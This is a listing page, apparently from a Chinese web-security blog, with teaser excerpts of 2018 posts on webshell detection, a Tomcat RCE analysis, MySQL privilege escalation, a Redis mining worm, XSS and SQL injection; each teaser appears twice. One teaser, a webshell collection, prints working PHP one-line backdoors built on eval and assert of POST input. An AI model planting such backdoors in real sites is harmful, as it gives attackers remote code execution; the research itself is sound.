web敏感资产fuzz NNN4cy WEB安全 2018-05-30 5058 0 0 简介 背景 程序最新地址:SRCHunter一款基于python的开源扫描器 有网友反馈信息收集的脚本有bug,debug下 实现核心思想 尽可能的考虑每一种情况 | 处理每一个异常并捕获 | 每个变量初始化 | 随机无序验证 主要…
web敏感资产fuzz NNN4cy WEB安全 2018-05-30 5058 0 0 简介 背景 程序最新地址:SRCHunter一款基于python的开源扫描器 有网友反馈信息收集的脚本有bug,debug下 实现核心思想 尽可能的考虑每一种情况 | 处理每一个异常并捕获 | 每个变量初始化 | 随机无序验证 主要…
深度学习PHP webshell查杀引擎demo NNN4cy WEB安全 2018-05-29 3924 0 2 传统webshell查杀思路 规则系统 旁路执行 沙箱 基于机器学习/深度学习的webshell查杀引擎,通过专家知识提取特征训练分类器,其结果受样本、特征、结构等多种因素影响。 特征维度: 文本语义(n-gram/TF-IDF/w…
深度学习PHP webshell查杀引擎demo NNN4cy WEB安全 2018-05-29 3924 0 2 传统webshell查杀思路 规则系统 旁路执行 沙箱 基于机器学习/深度学习的webshell查杀引擎,通过专家知识提取特征训练分类器,其结果受样本、特征、结构等多种因素影响。 特征维度: 文本语义(n-gram/TF-IDF/w…
Tomcat信息泄漏和远程代码执行漏洞分析报告 NNN4cy WEB安全 2018-05-28 2677 0 1 一. 漏洞概述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,官方评级为高危,在一定…
Tomcat信息泄漏和远程代码执行漏洞分析报告 NNN4cy WEB安全 2018-05-28 2677 0 1 一. 漏洞概述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,官方评级为高危,在一定…
MYSQL 提权总结 NNN4cy WEB安全 2018-05-25 3225 0 0 最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们…
MYSQL 提权总结 NNN4cy WEB安全 2018-05-25 3225 0 0 最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们…
Linux Redis自动化挖矿感染蠕虫分析及安全建议 NNN4cy WEB安全 2018-05-24 3075 0 0 作者:fooying@云鼎实验室 一、背景 自从Redis未授权问题获取Linux系统root权限的攻击方法的披露后,由于其易用性,利用该问题入侵Linux服务进行挖矿、扫描等的黑客行为一直层出不穷;而在众多利用该问题入侵服务器进行…
Linux Redis自动化挖矿感染蠕虫分析及安全建议 NNN4cy WEB安全 2018-05-24 3075 0 0 作者:fooying@云鼎实验室 一、背景 自从Redis未授权问题获取Linux系统root权限的攻击方法的披露后,由于其易用性,利用该问题入侵Linux服务进行挖矿、扫描等的黑客行为一直层出不穷;而在众多利用该问题入侵服务器进行…
php一句话木马集合 NNN4cy WEB安全, 工具分享 2018-05-22 5640 0 0 eval.php 1 <?php @eval($_POST['cmd'])?> assert.php 1 <?php assert($_POST[cmd]);?> min_lenth.php 1 2 <…
php一句话木马集合 NNN4cy WEB安全, 工具分享 2018-05-22 5640 0 0 eval.php 1 <?php @eval($_POST['cmd'])?> assert.php 1 <?php assert($_POST[cmd]);?> min_lenth.php 1 2 <…
基于Service Worker 的XSS攻击面拓展 NNN4cy WEB安全 2018-05-18 2497 0 3 作者:LoRexxar' 在前段时间参加的CTF中,有一个词语又被提出来,Service Worker,这是一种随新时代发展应运而生的用来做离线缓存的技术,最早在2015年被提出来用作攻击向,通过配合xss点,我们可以持久化的xss…
基于Service Worker 的XSS攻击面拓展 NNN4cy WEB安全 2018-05-18 2497 0 3 作者:LoRexxar' 在前段时间参加的CTF中,有一个词语又被提出来,Service Worker,这是一种随新时代发展应运而生的用来做离线缓存的技术,最早在2015年被提出来用作攻击向,通过配合xss点,我们可以持久化的xss…
Web安全之SQL注入攻击技巧与防范 NNN4cy WEB安全 2018-05-17 2204 0 0 在Web1.0时代,人们更多是关注服务器端动态脚本语言的安全问题,比如将一个可执行脚本(俗称Webshell)通过脚本语言的漏洞上传到服务器上,从而获得服务器权限。在Web发展初期,随着动态脚本语言的发展和普及,以及早期工程师对安全…
Web安全之SQL注入攻击技巧与防范 NNN4cy WEB安全 2018-05-17 2204 0 0 在Web1.0时代,人们更多是关注服务器端动态脚本语言的安全问题,比如将一个可执行脚本(俗称Webshell)通过脚本语言的漏洞上传到服务器上,从而获得服务器权限。在Web发展初期,随着动态脚本语言的发展和普及,以及早期工程师对安全…
PHP trick(代码审计关注点) NNN4cy WEB安全 2018-05-14 1967 0 0 随着代码安全的普及,越来越多的开发人员知道了如何防御sqli、xss等与语言无关的漏洞,但是对于和开发语言本身相关的一些漏洞和缺陷却知之甚少,于是这些点也就是我们在Code audit的时候的重点关注点。本文旨在总结一些在PHP代码…
PHP trick(代码审计关注点) NNN4cy WEB安全 2018-05-14 1967 0 0 随着代码安全的普及,越来越多的开发人员知道了如何防御sqli、xss等与语言无关的漏洞,但是对于和开发语言本身相关的一些漏洞和缺陷却知之甚少,于是这些点也就是我们在Code audit的时候的重点关注点。本文旨在总结一些在PHP代码…
用 javascript 框架绕过 XSS 防御 SecJack WEB安全, 渗透测试 2018-05-11 1796 0 0 原文:《Abusing JavaScript frameworks to bypass XSS mitigations》 译者:Twosecurity 在 AppSec Europe Sebastian Lekies 中,Krzys…
用 javascript 框架绕过 XSS 防御 SecJack WEB安全, 渗透测试 2018-05-11 1796 0 0 原文:《Abusing JavaScript frameworks to bypass XSS mitigations》 译者:Twosecurity 在 AppSec Europe Sebastian Lekies 中,Krzys…